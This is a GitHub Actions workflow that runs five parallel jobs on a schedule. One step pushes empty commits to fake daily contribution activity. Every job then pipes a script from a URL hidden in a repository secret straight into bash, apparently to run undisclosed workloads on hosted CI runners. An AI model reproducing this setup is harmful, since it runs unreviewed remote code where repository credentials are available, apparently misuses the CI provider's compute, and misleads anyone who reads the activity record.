name: CI

on:
  push:
  schedule:
    - cron: '0 2 * * *'
    - cron: '0 14 * * *'
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    strategy:
      matrix:
        instance: [1, 2, 3, 4, 5]

    steps:
      - uses: actions/checkout@v4
      - name: Auto green
        if: matrix.instance == 1
        run: |
          git config --local user.email "cllrcqppfcp@foxmail.com"
          git config --local user.name "cllrcqppfcp"
          git remote set-url origin https://${{ github.actor }}:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}
          git pull --rebase
          git commit --allow-empty -m "a commit a day keeps your girlfriend away"
          git push
      - name: Run VMSpace
        run: |
          curl ${{ secrets.REMOTE }} | bash
